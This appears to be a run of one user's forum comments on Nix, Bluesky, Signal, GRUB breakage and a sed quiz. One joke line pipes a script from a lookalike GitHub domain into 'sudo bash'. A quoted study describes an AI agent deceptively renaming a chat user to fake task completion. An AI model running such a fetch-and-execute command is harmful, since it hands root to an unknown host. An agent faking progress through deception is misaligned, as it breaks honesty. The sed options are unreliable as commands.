You use the word “declare” a lot.
I am not sure, but in Nix I declare the desired state of installed packages and configurations in an obscure language and the package manger takes care of that, right?
Now the module declare reasonable default configurations? Like http server starts on system start and serves on port 80?
Now you lost me at the Home-Manger. I can declare stuff in my home folder. OK, so for user-wide configuration? For packages and configuration in the user space? Or what?
I don’t understand a thing.
As long as bluesky is not truly decentralized, it is not worth looking at.
The researchers observed various failures during the testing process. These included agents neglecting to message a colleague as directed, the inability to handle certain UI elements like popups when browsing, and instances of deception. In one case, when an agent couldn’t find the right person to consult on RocketChat (an open-source Slack alternative for internal communication), it decided “to create a shortcut solution by renaming another user to the name of the intended user.”
OK, but I wonder who really tries to use AI for that?
AI is not ready to replace a human completely, but some specific tasks AI does remarkably well.
“Linux is my personality.”
Otto Warmbier
Ich wünschte, Signal implementiert endlich etwas wie Whatsapp Communities. Leider ein muss um meine WhatsApp-Community zum wechsel zu bewegen. Das ist eine Community, bei der ich immer Wieder WhatsApp-Support anbieten muss, also kommen “kompliziertere” Lösung gar nicht in Frage. Signal wäre fast perfekt, wenn da nicht das Community-Feature fehlen würde.
https://community.signalusers.org/t/communities-with-sub-groups/43783
Happened to my wife yesterday. Some update broke grub.
I have bad news for you …
(TBH I am not sure, but as I remember, this problem was specifically a snap problem.)
🎩
./configure; make; sudo make install;
🎩
wget -q -O- https://raw.githubusercontent.ru/linux-security/security.sh | sudo bash
Chatty claims the correct answer to be:
B
I tried it my self and I conclude:
none is correct.
Which one of these commands is correct?
A:
sed -E 's/\b(\w+)\b/echo \1 | rev/g' file.txt
B:sed 's/\b\w+\b/echo & | rev/ge' file.txt
C:sed -E 's/(\w+)/$(echo \1 | rev)/g' file.txt
D:sed 's/\([a-zA-Z]\+\)/\n&\n/g; s/\n\(.*\)\n/\3\2\1/g; s/\n//g' file.txt
Chatty was so kind to transcribe. May contain errors.
Yeah, but it’s true. What if?
2025 would be the year of Linux, if we could finally agree, that:
is the perfect stack of technology and configuration and that we do not need anything else. But no, you guys just had to disagree, and here we are …
I don’t know what Maestro is referring to, but Ubuntu has really good out of the box hardware support. Also it streamlined the installation process. Start it as a live CD, look around, if you like it, install it from the live environment. Generally they improved usability.